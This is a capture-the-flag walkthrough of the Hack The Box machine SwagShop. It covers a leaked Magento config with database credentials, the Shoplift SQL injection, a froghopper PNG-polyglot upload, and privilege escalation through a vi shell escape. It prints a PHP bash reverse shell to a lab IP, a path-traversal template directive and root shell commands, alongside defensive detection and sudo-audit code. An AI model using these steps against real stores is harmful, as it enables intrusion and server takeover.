Walkthru for SwagShop
This is a detailed walkthrough for SwagShop, written by dR1PPy.
Challenges like the one posed by SwagShop are some of my favorites: the ones that require a good combination of toolset skills and exploit-chaining skills.
Overall a fun box to beat up on. Much thanks to ch4p for the challenge!
Banner on the site:

```
We are open! (Almost)
Join the beta HTB Swag Store!
https://hackthebox.store/password
PS: Use root flag as password!
```
Enumeration
Port Scan All The Things!
```
Services
========

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
10.10.10.140  22    tcp    ssh   open   OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
10.10.10.140  80    tcp    http  open   Apache httpd 2.4.18 (Ubuntu)
```
We quickly verify that the OpenSSH and Apache versions are not known exploitable releases and move on.
During our HTTP enumeration we find this XML file:

http://10.10.10.140/app/etc/local.xml

It contains what look like database credentials (possibly for the beta SwagShop):

```xml
<host><![CDATA[localhost]]></host>
<username><![CDATA[root]]></username>
<password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
<dbname><![CDATA[swagshop]]></dbname>
```

We are also able to identify the framework as Magento: local.xml is Magento's main configuration file, and the app/etc/.htaccess Magento ships with is supposed to deny web access to it, so finding it readable is a misconfiguration in itself.
Gaining User Access
After some Google searching we find an exploit (the Magento "Shoplift" SQL injection) which gives us access to the admin panel of the framework:

https://github.com/joren485/Magento-Shoplift-SQLI/

Once inside we can use the Magento froghopper attack to get a shell:

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
The first step is to enable symlinks in the Magento settings (this is what lets a template path point outside the theme directory):

System > Configuration > Advanced > Developer > Template Settings > Allow Symlinks = "Yes" (then save config)

Now we prep our shell by creating a file with the content below:

```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.17/8888 0>&1'"); ?>
```
Now we grab some random PNG file and append our shell code to it:

```sh
cat /tmp/shell.code >> random.png

### If the shell doesn't work, try a better reverse shell example:
cat php-reverse-shell-1.0/php-reverse-shell.php >> random.png
```
Now back to Magento, where we create a catalog item with our new PNG as the image.
Then we create a newsletter to load our code by adding the following to its body:

```
{{block type='core/template' template='../../../../../../media/catalog/category/dR1PPy.png'}}
```
Now we start our listener, then preview the template:

```sh
nc -lvp 8888   # on my local machine
```

Using the froghopper attack with a PNG file worked!
(NOTE: for some reason this attack kept failing with JPG files.)
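From the defender's side, the froghopper chain above depends on two things a server-side check can catch: an uploaded "image" that carries data after the PNG's IEND chunk, and a newsletter or CMS body whose `{{block}}` directive has a `template=` argument that leaves the theme tree. The Python below is an added example written for this walkthrough; it is not code from Magento, Foregenix or the author. The function names are mine, the 1x1 PNG and the sample newsletter body are constructed inline, and the PHP tag check is a plain substring match, not a full parser.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailing_data(data: bytes) -> bytes:
    """Return every byte that follows the IEND chunk of a PNG file.

    A well-formed PNG ends right after IEND, so a non-empty trailer means
    something was appended (the froghopper upload appends PHP there).
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4          # header + data + CRC
        if chunk_end > len(data):
            raise ValueError("truncated PNG chunk")
        if ctype == b"IEND":
            return data[chunk_end:]
        pos = chunk_end
    raise ValueError("PNG has no IEND chunk")


def classify_upload(data: bytes) -> str:
    """Classify an uploaded PNG as 'clean', 'php-polyglot' or 'trailing-data'."""
    trailer = png_trailing_data(data)
    if not trailer:
        return "clean"
    if b"<?php" in trailer or b"<?=" in trailer:
        return "php-polyglot"
    return "trailing-data"


# --- template directive check -------------------------------------------

BLOCK_DIRECTIVE = re.compile(r"\{\{\s*block\b([^}]*)\}\}", re.IGNORECASE)
TEMPLATE_ARG = re.compile(r"template\s*=\s*['\"]([^'\"]*)['\"]", re.IGNORECASE)


def unsafe_block_directives(body: str) -> list:
    """Return template= paths in {{block}} directives that escape the theme
    directory (absolute paths or any '..' path component)."""
    findings = []
    for match in BLOCK_DIRECTIVE.finditer(body):
        arg = TEMPLATE_ARG.search(match.group(1))
        if arg is None:
            continue
        path = arg.group(1)
        if path.startswith("/") or ".." in path.replace("\\", "/").split("/"):
            findings.append(path)
    return findings


# --- constructed sample data ---------------------------------------------

def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A valid 1x1 RGB PNG built in memory (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")   # filter byte + one black pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


# Constructed newsletter body shaped like the directive used in the walkthrough.
SAMPLE_BODY = ("<p>Hello</p>"
               "{{block type='core/template' "
               "template='../../../../../../media/catalog/category/dR1PPy.png'}}")

if __name__ == "__main__":
    print(classify_upload(minimal_png()))                         # clean
    print(classify_upload(minimal_png() + b"<?php echo 1; ?>"))   # php-polyglot
    print(unsafe_block_directives(SAMPLE_BODY))
```

Rejecting any upload with a non-empty trailer (rather than only ones containing a PHP tag) is the simpler policy; re-encoding images on upload achieves the same thing without a parser. For the template side, the directive check is a compensating control: the real fix is keeping Allow Symlinks off and applying the vendor patches that stopped `{{block}}` from loading arbitrary templates.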
Once we have a shell we upgrade it to a full TTY. We see /usr/bin/python3 is available, so we can get a TTY like so:

```sh
python3 -c 'import pty; pty.spawn("/bin/sh")'
```
We grab the user flag found in /home/haris/user.txt and proceed to escalation.
Privilege Escalation
Again we start our enumeration cycle using the standard enumeration tools.
Quickly, LinEnum shows us the path to root:

```
[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

[+] Possible sudo pwnage!
/usr/bin/vi
```
We can execute vi as root as long as the file we edit is under the /var/www/html/ directory.
So we exploit this like so:

```sh
sudo /usr/bin/vi /var/www/html/test.sh
```

Once in the vi editor we break out to our root shell like the Kool-Aid man:

```
:!/bin/sh
# whoami
root
# cd /root/
# ls
root.txt
```
OH Yeah!
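The sudo rule LinEnum surfaced is the entire privilege escalation, and rules like it are easy to audit for automatically. The Python below is an added example written for this walkthrough, not part of LinEnum, GTFOBins or the author's notes: it parses rule lines from `sudo -l` output and flags the three properties that make this one fatal (no password, runs as root, an editor with a shell escape) plus the wildcard argument. The set of shell-escaping binaries is a small hand-picked subset, not the full GTFOBins catalogue, and the `sudo -l` text is a constructed copy of the output shown above. On the box side the fix is to not hand www-data an editor as root at all; where a file genuinely must be editable, `sudoedit` runs the editor as the invoking user and only the file copy-back as root.

```python
import os
import re
import shlex

# Hand-picked subset of binaries with an interactive shell escape
# (vi's ':!/bin/sh' is the one used on this box); GTFOBins has the full list.
SHELL_ESCAPE_BINARIES = {
    "vi", "vim", "view", "nano", "less", "more", "man",
    "find", "awk", "perl", "python", "python3", "sh", "bash",
}

# One rule line from `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/vi /var/www/html/*"
RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def audit_sudo_rule(line: str) -> list:
    """Return finding codes for one sudo rule line; [] if it is not a rule."""
    m = RULE.match(line.strip())
    if m is None:
        return []
    findings = []
    runas = m.group("runas").split(":")[0].strip()      # "root : root" -> "root"
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    argv = shlex.split(m.group("cmd"))
    if not argv:
        return []
    binary = os.path.basename(argv[0])

    if "NOPASSWD" in tags:
        findings.append("nopasswd")                 # no authentication step
    if runas in ("root", "ALL"):
        findings.append("runas-root")
    if argv[0] == "ALL":
        findings.append("any-command")
    elif binary in SHELL_ESCAPE_BINARIES:
        findings.append("shell-escape:" + binary)   # editor or pager == shell
    if any(ch in arg for arg in argv[1:] for ch in "*?["):
        # sudoers matches arguments with fnmatch, and in arguments '*' also
        # matches '/', so a globbed path is not a real restriction on the file.
        findings.append("wildcard-argument")
    return findings


def audit_sudo_output(text: str) -> dict:
    """Map every rule line in a `sudo -l` dump to its findings."""
    results = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("("):
            results[line] = audit_sudo_rule(line)
    return results


# Constructed copy of the sudo -l output LinEnum printed in the walkthrough.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
"""

if __name__ == "__main__":
    for rule, findings in audit_sudo_output(SAMPLE_SUDO_L).items():
        print(rule, "->", ", ".join(findings) or "ok")
```

Run against the sample, the vi rule reports `nopasswd, runas-root, shell-escape:vi, wildcard-argument`; the same check dropped into a configuration-audit job over `sudo -l -U <user>` output for service accounts catches this class of misconfiguration before anyone needs LinEnum to find it.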
Resources:

- Magento SQLi POC: https://github.com/joren485/Magento-Shoplift-SQLI/
- Magento Froghopper Attack: https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
- GTFOBins for the PrivEsc syntax: https://gtfobins.github.io/